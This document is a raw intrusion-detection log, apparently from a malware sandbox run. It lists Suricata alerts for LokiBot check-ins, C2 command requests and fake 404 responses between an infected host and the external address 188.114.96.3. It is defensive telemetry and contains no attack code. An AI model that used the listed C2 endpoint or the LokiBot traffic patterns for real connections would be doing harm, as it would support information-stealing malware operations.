                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49735 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55924 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55924 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55898 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55919
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55968 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55917 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55989 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55986 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55903 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55986 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55949 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56006 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55949 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56006 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55898 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55908 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55902
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55908 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55908 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55986 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55986 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55908 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:56006 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55904 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55904 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55904 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55986
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55893 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49735
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49734
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55893 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55893 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49733
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55945 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55945 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55893
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55935 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55927
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55935 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55932
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:56006 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55914 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55968 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55918 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55918 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55924
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55968 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49745
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55936 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55925
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55945 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55905 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55905 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55905 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55989
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55922
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55897 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55984 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55984 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55935 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55984 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56005 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55895
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55904 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55943
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55912 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55984 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55960 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55935 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55968 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55936 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55898 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55917
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55894
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55908 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55905 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56005 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55897 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55908
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55918 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55934 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55934 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55934 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55915 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55915 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55915 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55918 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55918 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55984 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55934 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55934 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55952 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55952 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55952 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55980 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55935 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55952 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55952 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55899 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55936 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49737 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55952
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55936 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49743
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55898
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55905 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56005 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55897 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55963 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55963 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55963 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55954 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:56005 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55912 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:56005 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55963 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55912 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55915 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55960 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55914 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55912 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55980 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55946 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55967
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55945 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55936 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55899 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49732
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55954 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55954 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55949 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55904 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55954 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55954 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55963 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55940 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55940 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55984
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55960 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:56005
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55912 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55960 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55914 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55946 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55991 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55935
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55899 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55941 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55941 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55941 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49739
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55931 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55931 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55931 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55941 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55941 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55934
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55940 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55897
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55914 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55960 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55931 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55941
